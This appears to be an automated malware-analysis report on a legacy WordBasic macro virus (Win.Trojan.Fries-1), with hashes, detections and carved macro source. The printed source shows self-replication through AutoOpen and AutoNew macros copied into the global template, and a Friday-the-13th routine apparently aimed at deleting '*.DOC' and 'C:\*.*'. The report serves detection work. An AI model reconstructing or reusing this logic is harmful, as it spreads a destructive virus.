Win.Trojan.Fries-1 — Office (OLE) malware analysis

Static analysis result for SHA-256 fd604ccaf109c36a…

MALICIOUS

Office (OLE)

Size: 10.0 KB
First seen: 2012-06-14
MD5: 270ef4b986f37491d0a2a15d2257c0c8
SHA-1: a80f90a28cc71ef173d7b2906f2316bc6c6bdb04
SHA-256: fd604ccaf109c36a07893933f235e0dc695a84d4534e84b8af5a62833c68250a
Risk Score: 102

Malware Insights

Win.Trojan.Fries-1 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic

The file is identified as a legacy WordBasic macro virus, specifically a "RSN MACRO VIRUS Goat file". This indicates the presence of malicious macros intended to execute arbitrary code. The ClamAV detection further confirms its malicious nature as Win.Trojan.Fries-1. The document body contains numerous macro-related keywords and function names, reinforcing the macro execution attack vector.

Heuristics (3)

  • ClamAV: Win.Trojan.Fries-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Fries-1
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • Recovered legacy WordBasic macro source info OLE_LEGACY_WORDBASIC_MACRO_SOURCE
    The Word 6.0/95 document stores tokenised WordBasic macros in the WordDocument stream rather than as a modern VBA project, so VBA source extraction cannot see them. The macro source was detokenised and carved so its identifiers, string literals (file paths, URLs, registry keys, message text) and comments are available for review and signature scanning.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: wordbasic_macros.txt
Kind: wordbasic-macro
Source: analyzer.wordbasic (detokenised Word 6/95 WordBasic macro source)
Size: 3651 bytes
SHA-256: 92b7aac73cd4a5322a225462ecd9d275e59a36c008ac5c056de2936418e93843
Preview script
First 1,000 lines of the extracted script
= @cmd6e69 29551 =
MAIN
@cmd809e 1
t1 = @cmd80f7
t = t1 = @cmd8100 "0:00:03"
Alarm$ = @cmd8007 @cmd80f4 t = ":" = Kor1$ @cmd80f5 t = ":" = Kor1$ @cmd80ff t
@cmd80b3 Alarm$ , "Begin"
Kor1$ Argument
s$ = @cmd80ea @cmd8007 Argument
Argument 10 s$ = "0" = s$
Kor1$ = s$
MAIN
@cmd809e 1
True = 1 False = 0
Flag_v = False Flag_i = False
count = 1 @cmd80b7 0
name$ = @cmd80b8 count , 0
name$ = = Flag_i = True
name$ = "Fri13" Flag_v = True
count
Flag_i = True
t = t1 = @cmd8100 "0:00:32"
Alarm$ = @cmd8007 @cmd80f4 t = ":" = Fri13x @cmd80f5 t = ":" = Fri13x @cmd80ff t
@cmd80b3 Alarm$ , =
Flag_v = False
dlg2 @cmd004e
dlg2
name$ = dlg2 = "\" = dlg2 @cmd6400 norm$ = dlg2
Move "AutoOpen" , "AutoOpenf" , name$ , norm$
Move "Begin" , "Beginf" , name$ , norm$
Move "AutoClosex" , "AutoClose" , name$ , norm$
Move "AutoOpenx" , "AutoOpen" , name$ , norm$
Move "AutoOpenx" , "AutoNew" , name$ , norm$
Move "Fri13x" , "Fri13" , name$ , norm$
t = t1 = @cmd8100 "0:00:32"
Alarm$ = @cmd8007 @cmd80f4 t = ":" = Fri13x @cmd80f5 t = ":" = Fri13x @cmd80ff t
@cmd00d1 = 0
@cmd80b3 Alarm$ , "Fri13"
Move inp$ , outp$ , name$ , norm$
@cmd00de , = name$ , = norm$ , = inp$ , = 3
@cmd00de , = norm$ , = inp$ , = outp$ , = 3
MAIN
True = 1 False = 0
dlg2 @cmd004e
Flag_i = False
count = 1 @cmd80b7 0
name$ = @cmd80b8 count , 0
name$ = = Flag_i = True
count
Flag_i = True
t = t1 = @cmd8100 "0:00:32"
Alarm$ = @cmd8007 @cmd80f4 t = ":" = Fri13 @cmd80f5 t = ":" = Fri13 @cmd80ff t
@cmd80b3 Alarm$ , =
@cmd8023 = True
@cmd80b7 1 = 0
@cmd0054 = 1
dlg2
name$ = dlg2 = "\" = dlg2 @cmd6400 DelMacro "AutoOpen" , name$
DelMacro "Begin" , name$
DelMacro "AutoClosex" , name$
DelMacro "AutoOpenx" , name$
DelMacro "Fri13x" , name$
dlg2
name$ = dlg2 = "\" = dlg2 @cmd6400 norm$ = dlg2
MoveD "Beginf" , "Begin" , norm$ , name$
MoveD "AutoClose" , "AutoClosex" , norm$ , name$
MoveD "AutoOpen" , "AutoOpenx" , norm$ , name$
MoveD "AutoOpenf" , "AutoOpen" , norm$ , name$
MoveD "Fri13" , "Fri13x" , norm$ , name$
t = t1 = @cmd8100 "0:00:32"
Alarm$ = @cmd8007 @cmd80f4 t = ":" = Fri13 @cmd80f5 t = ":" = Fri13 @cmd80ff t
@cmd80b3 Alarm$ , "Fri13"
MoveD inp$ , outp$ , nameinp$ , nameout$
@cmd00de , = nameinp$ , = nameout$ , = inp$ , = 3
@cmd00de , = nameout$ , = inp$ , = outp$ , = 3
DelMacro NameMscro$ , NameOut$
True = 1 False = 0
Flag_i = False
count = 1 @cmd80b7 1
name$ = @cmd80b8 count , 1
name$ = NameMscro$ Flag_i = True
count
Flag_i = True @cmd00de , = NameOut$ , = NameMscro$ , = 3
MAIN
True = 1 False = 0
Flag_i = False
count = 1 @cmd80b7 0
name$ = @cmd80b8 count , 0
name$ = = Flag_i = True
count
Flag_i = True
t = t1 = @cmd8100 "0:00:32"
Alarm$ = @cmd8007 @cmd80f4 t = ":" = Fri13 @cmd80f5 t = ":" = Fri13 @cmd80ff t
@cmd80b3 Alarm$ , =
t = t1 = @cmd8100 "0:00:32"
Alarm$ = @cmd8007 @cmd80f4 t = ":" = Fri13 @cmd80f5 t = ":" = Fri13 @cmd80ff t
@cmd80b3 Alarm$ , "Fri13"
MAIN
@cmd809e 1
True = 1 False = 0
zader$ = "0:01:00"
Flag_i = False
count = 1 @cmd80b7 0
name$ = @cmd80b8 count , 0
name$ = = Flag_i = True
count
t1 = @cmd80f7
Flag_i = True
t = t1 = @cmd8100 "0:00:32"
Alarm$ = @cmd8007 @cmd80f4 t = ":" = Kor1$ @cmd80f5 t = ":" = Kor1$ @cmd80ff t
@cmd80b3 Alarm$ , =
t = t1 = @cmd8100 zader$
Alarm$ = @cmd8007 @cmd80f4 t = ":" = Kor1$ @cmd80f5 t = ":" = Kor1$ @cmd80ff t
@cmd803a 0 Destruct
@cmd80b3 Alarm$ , "Fri13"
Kor1$ Argument
s$ = @cmd80ea @cmd8007 Argument
Argument 10 s$ = "0" = s$
Kor1$ = s$
Destruct
@cmd80f8 @cmd80f7 = 6 @cmd80f2 @cmd80f7 = 13
@cmd809e 1
@cmd80ab "*.DOC"
@cmd80ab "C:\*.*"
@cmd802b         = @cmd8005 10 = @cmd8005 13 =                           = @cmd8005 10 = @cmd8005 13 =                                               ,                   , 64